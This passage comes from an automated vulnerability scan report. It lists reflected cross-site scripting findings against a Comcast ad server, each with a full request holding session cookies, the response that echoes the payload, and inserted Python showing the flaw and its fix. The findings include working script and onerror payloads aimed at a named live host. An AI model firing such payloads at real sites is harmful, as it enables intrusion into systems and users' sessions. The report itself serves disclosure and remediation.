Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab9d"><script>alert(1)</script>2fc6280efcb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/L/2083215584/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647 was submitted in the REST URL parameter 8. This input was echoed as 85d34"><img src=a onerror=alert(1)>15c94468647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x3785d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1898369984/x3785d34"><img src=a onerror=alert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803ac"><script>alert(1)</script>0d9d2df3c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?803ac"><script>alert(1)</script>0d9d2df3c86=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1005352958/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&803ac"><script>alert(1)</script>0d9d2df3c86=1" WIDTH=2 HEIGHT=2>
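The three findings above (2.93 and 2.94, which land in path segments, and 2.95, which lands in the name of a query parameter) all reach the same sink: the request target is copied into the double-quoted SRC attribute of the 2x2 tracking IMG. The following Python is an added example, not code from the XSS.CX report or from the ad server, whose source is not on this page. It reproduces the reflection with a stand-in renderer (render_beacon_vulnerable and render_beacon_fixed are assumptions about the server's behaviour), shows the fix a practitioner would apply (percent-encode each path segment and re-serialise the query as URL components, then HTML-attribute-escape the finished URL), and includes the check that separates a real attribute breakout from an encoded echo. The hostname, base path and payloads are the ones in the report; inject_segment follows the report's 1-based "REST URL parameter" numbering.

```python
# Added example: not code from the XSS.CX report or from the ad server. It is a
# stand-in that reproduces the reflection documented in 2.93-2.95 and shows the
# encoding that closes it. ORIGIN, BASE_PATH and the payloads come from the report;
# the render_* functions and inject_segment are assumptions, not the server's code.
from html import escape
from urllib.parse import parse_qsl, quote, unquote, urlencode

ORIGIN = "http://oascentral.comcast.net"
BASE_PATH = ("/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37"
             "/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev"
             "/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a")

# Payloads exactly as the report submitted them (2.93, 2.94 raw and decoded, 2.95).
SCRIPT_PAYLOAD = '7ab9d"><script>alert(1)</script>2fc6280efcb'
ONERROR_PAYLOAD_RAW = '85d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647'
ONERROR_PAYLOAD_DECODED = '85d34"><img src=a onerror=alert(1)>15c94468647'
PARAM_NAME_PAYLOAD = '803ac"><script>alert(1)</script>0d9d2df3c86'


def inject_segment(path, index, payload):
    """Append payload to "REST URL parameter <index>" using the report's numbering:
    parameter 1 is the first segment after the leading slash."""
    segments = path.split("/")          # segments[0] is '' because path starts with '/'
    segments[index] += payload
    return "/".join(segments)


def render_beacon_vulnerable(request_target):
    """Stand-in for the behaviour seen in the responses above: the server URL-decodes
    the request path and query and copies them verbatim into a double-quoted SRC."""
    path, _, query = request_target.partition("?")
    src = f"{ORIGIN}{unquote(path)}?_RM_EMPTY_&{unquote(query)}"
    return f'<IMG SRC="{src}" WIDTH=2 HEIGHT=2>'


def render_beacon_fixed(request_target):
    """Hardened stand-in: decode once, then encode for every context the data passes
    through. Path segments are percent-encoded as URL components (so '"', '<' and '>'
    can never appear raw), the query is re-serialised with urlencode, and the finished
    URL is HTML-attribute-escaped on output."""
    path, _, query = request_target.partition("?")
    safe_path = "/".join(quote(unquote(seg), safe="") for seg in path.split("/"))
    safe_query = urlencode(parse_qsl(query, keep_blank_values=True))
    src = f"{ORIGIN}{safe_path}?_RM_EMPTY_&{safe_query}"
    return f'<IMG SRC="{escape(src, quote=True)}" WIDTH=2 HEIGHT=2>'


def breaks_out_of_attribute(response_body, decoded_payload):
    """Scanner-style check: the finding is real only if the payload's closing quote
    and the tag that follows it reach the response body without encoding."""
    return decoded_payload in response_body


def demo():
    """Run the three report cases through both renderers.
    Returns {label: (vulnerable_breaks_out, fixed_breaks_out)}."""
    cases = {
        "2.93 path segment 6, script tag":
            (inject_segment(BASE_PATH, 6, SCRIPT_PAYLOAD), SCRIPT_PAYLOAD),
        "2.94 path segment 8, onerror handler":
            (inject_segment(BASE_PATH, 8, ONERROR_PAYLOAD_RAW), ONERROR_PAYLOAD_DECODED),
        "2.95 query parameter name":
            (f"{BASE_PATH}?{PARAM_NAME_PAYLOAD}=1", PARAM_NAME_PAYLOAD),
    }
    results = {}
    for label, (target, decoded) in cases.items():
        results[label] = (
            breaks_out_of_attribute(render_beacon_vulnerable(target), decoded),
            breaks_out_of_attribute(render_beacon_fixed(target), decoded),
        )
    return results


if __name__ == "__main__":
    for label, (vuln, fixed) in demo().items():
        print(f"{label}: vulnerable={vuln} fixed={fixed}")
```

Running the module prints vulnerable=True fixed=False for all three cases, and render_beacon_fixed leaves a clean BASE_PATH untouched because every character in it is URL-unreserved. The same two encoders close the remaining oascentral.comcast.net findings below, which differ only in which segment the canary lands in.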

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5455c"><script>alert(1)</script>6a987d872c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/286075359/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc0c"><script>alert(1)</script>42084a2b583 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/1434151577/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126b9"><script>alert(1)</script>0c7d718d7cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/1460830530/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831fb"><script>alert(1)</script>848b3831af8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/L/982068884/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d was submitted in the REST URL parameter 9. This input was echoed as e696a"><img src=a onerror=alert(1)>850fbda351d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
